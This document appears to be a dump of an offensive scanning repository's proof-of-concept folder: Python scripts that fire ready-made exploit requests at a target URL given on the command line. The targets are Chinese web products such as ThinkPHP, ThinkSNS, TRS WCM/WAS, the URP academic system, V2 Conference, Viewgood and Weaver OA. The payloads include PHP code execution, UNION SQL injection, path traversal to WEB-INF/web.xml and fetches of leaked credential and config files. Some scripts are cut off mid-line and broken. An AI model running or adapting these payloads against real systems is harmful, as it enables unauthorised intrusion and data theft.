https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/speedcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/tcexam/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/tcexam/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/tcexam/tcexam_reinstall_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TCExam重新安装可getshell漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-046974
6 | author: Lucifer
7 | description: /install/install.php文件可以重新安装,在任意输入框中写入 ');?>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = tcexam_reinstall_getshell_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/thinkphp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/thinkphp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/thinkphp/thinkphp_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ThinkPHP 代码执行漏洞
5 | referer: http://zone.wooyun.org/index.php?do=view&id=44
6 | author: Lucifer
7 | description: ThinkPHP 版本3.0~3.1开启Lite模式后preg_replace使用了/e选项,同时第二个参数使用双引号,所以造成了代码执行,可直接GETSHELL
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class thinkphp_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"Configuration File (php.ini) Path" in req.text:
25 | cprint("[+]存在ThinkPHP 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = thinkphp_code_exec_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/thinksns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/thinksns/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/thinksns/thinksns_category_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: thinksns category模块代码执行
5 | referer: Arice
6 | author: Lucifer,Arice
7 | description: 过滤不严导致的代码执行
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class thinksns_category_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id%5Btask_to_run%5D=addons/Area)->getAreaList();phpinfo();%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在thinksns category模块代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = thinksns_category_code_exec_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/trs/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_ids_auth_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS ids身份认证信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-039729
6 | author: Lucifer
7 | description: 敏感信息泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_ids_auth_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/ids/admin/debug/env.jsp"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"JavaHome" in req.text and r"java.runtime.name" in req.text and r"java.vm.version" in req.text:
27 | cprint("[+]存在TRS ids身份认证信息泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_ids_auth_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_inforadar_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS网络信息雷达4.6系统敏感信息泄漏到进后台
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-091999
6 | author: Lucifer
7 | description: 敏感文件init_sysUsers.xml中泄露了用户名和密码密文,可直接登录系统。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_inforadar_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/inforadar/jsp/xml/init_sysUsers.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"java.beans.XMLDecoder" in req.text and r"property" in req.text:
27 | cprint("[+]存在TRS网络信息雷达4.6系统敏感信息泄漏漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_inforadar_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was40_passwd_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was40 passwd.htm页面泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-38875
6 | author: Lucifer
7 | description: 文件passwd.htm泄露,攻击者可爆破修改密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_was40_passwd_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/was40/passwd/passwd.htm"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"userPassword" in req.text and r"domodifypassword.jsp" in req.text:
27 | cprint("[+]存在TRS was40 passwd.htm页面泄露...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_was40_passwd_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was40_tree_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was40 tree导航树泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-038875
6 | author: Lucifer
7 | description: 访问was40/tree可查看信息导航树。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_was40_tree_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/was40/tree"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"tree?treekind=navigate" in req.text and r"administrator" in req.text:
27 | cprint("[+]存在TRS was40 tree导航树泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_was40_tree_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was5_config_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was5配置文件泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/WEB-INF/classes/com/trs/was/resource/wasconfig.properties内容泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_was5_config_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"sysdriver" in req.text and r"sysuser" in req.text:
27 | cprint("[+]存在TRS was5配置文件泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_was5_config_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_was5_download_templet.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS was5 download_templet.jsp任意文件下载
5 | referer: http://reboot.cf/2017/01/12/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86
6 | author: Lucifer
7 | description: download_templet.jsp参数type存在任意文件下载,下载文件均为压缩包。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_was5_download_templet_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/was5/admin/template/download_templet.jsp?type=../web/inc"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"x-zip-compressed" in req.headers["Content-Type"]:
27 | cprint("[+]存在TRS was5 download_templet.jsp任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_was5_download_templet_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_infoview_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm 6.x版本infoview信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2012-012957
6 | author: Lucifer
7 | description: 文件infoview.do中导致信息泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_wcm_infoview_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"" in req.text and r"" in req.text:
27 | cprint("[+]存在TRS wcm 6.x版本infoview信息泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_wcm_infoview_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_pre_as_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm pre.as 文件包含
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0120447
6 | author: Lucifer
7 | description: 文件common/pre.as中,参数_url未过滤存在文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_wcm_pre_as_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/common/pre.as?_url=/WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_wcm_pre_as_lfi_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_service_writefile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm webservice文件写入漏洞
5 | referer: https://www.secpulse.com/archives/18044.html
6 | author: Lucifer
7 | description: 拓尔思wcm系统webservice有两处操作可任意写入webshell。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_wcm_service_writefile_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wcm/services/trs:templateservicefacade?wsdl"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"writeFile" in req.text and r"writeSpecFile" in req.text:
27 | cprint("[+]存在拓尔思 wcm webservice文件写入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_wcm_service_writefile_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/typecho/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/typecho/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/umail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/umail/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/uniportal/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/uniportal/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/urp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/urp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_ReadJavaScriptServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP综合教务系统任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-054350
6 | author: Lucifer
7 | description: 文件com.runqian.base.util.ReadJavaScriptServlet中,参数file存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_ReadJavaScriptServlet_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在URP综合教务系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = urp_ReadJavaScriptServlet_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_query.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: urp查询接口曝露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-025424
6 | author: Lucifer
7 | description: urp查询接口未设置权限,可以越权查询任意学生信息,照片,成绩等
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_query_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/reportFiles/cj/cj_zwcjd.jsp"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"成绩单" in req.text:
25 | cprint("[+]存在urp查询接口曝露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = urp_query_BaseVerify(sys.argv[1])
33 | testVuln.run()
34 |
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_query2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP越权查看任意学生课表、成绩(需登录)
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-099950
6 | author: Lucifer
7 | description: 系统存在一个越权漏洞,登录之后可以通过姓名或学号查看任意学生成绩和课表。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_query2_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/test1.jsp"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"jmglAction.do" in req.text:
25 | cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+vulnurl, "yellow")
26 | cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+self.url+"/jmglAction.do?oper=xsmdcx", "yellow")
27 |
28 | except:
29 | cprint("[-] "+__file__+"====>连接超时", "cyan")
30 |
31 | if __name__ == "__main__":
32 | warnings.filterwarnings("ignore")
33 | testVuln = urp_query2_BaseVerify(sys.argv[1])
34 | testVuln.run()
35 |
--------------------------------------------------------------------------------
/pocs/cms/v2tech/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/v2tech/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/v2tech/v2Conference_sqli_xxe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0143276
6 | author: Lucifer
7 | description: 威速V2视频会议系统存在Union注入和XXE漏洞,可GETSHELL。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class v2Conference_sqli_xxe_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 |
24 | vulnurl = self.url + r"/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20UnIoN%20SeLeCt%201,Md5(1234),3,Md5(1234),5%23"
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
28 | cprint("[+]存在V2 ConferenceSQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = v2Conference_sqli_xxe_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/viewgood/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/viewgood/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/viewgood/viewgood_GetCaption_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 远古流媒体系统 GetCaption.ashx注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件GetCaption.ashx中,参数CaptionType存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class viewgood_GetCaption_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1%27AnD%201%3DConVert%28Int%2C%28Char%28116%29%252bChar%28121%29%252bChar%28113%29%252b@@Version%29%29--&AssetID=1&CaptionName=11"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"tyqMicrosoft" in req.text:
27 | cprint("[+]存在远古流媒体系统 GetCaption.ashx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = viewgood_GetCaption_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/weaver_oa/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA 数据库配置泄露
5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
6 | author: Lucifer
7 | description: mysql_config.ini泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class weaver_oa_db_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/mysql_config.ini"
23 | vulnurl = self.url + payload
24 |
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"datapassword" in req.text:
28 | cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA downfile.php 任意文件下载漏洞
5 | referer:
6 | author: Lucifer
7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class weaver_oa_filedownload_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/E-mobile/Data/downfile.php?url=123"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(self.url, headers=headers, timeout=10, verify=False)
27 | if req.status_code == 200:
28 | m = re.search(r'No error in ([^<]+)', req.text)
29 | if m:
30 | cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+self.url, "red")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>连接超时", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/wecenter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wecenter/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wecenter/wecenter_topic_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wecenter SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0106369
6 | author: Lucifer
7 | description: 文件explore/UPLOAD/?/topic/ajax/question_list中,参数topic_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wecenter_topic_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/explore/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29UnIoN/**/SeLeCt/**/Md5(1234)%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在wecenter SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
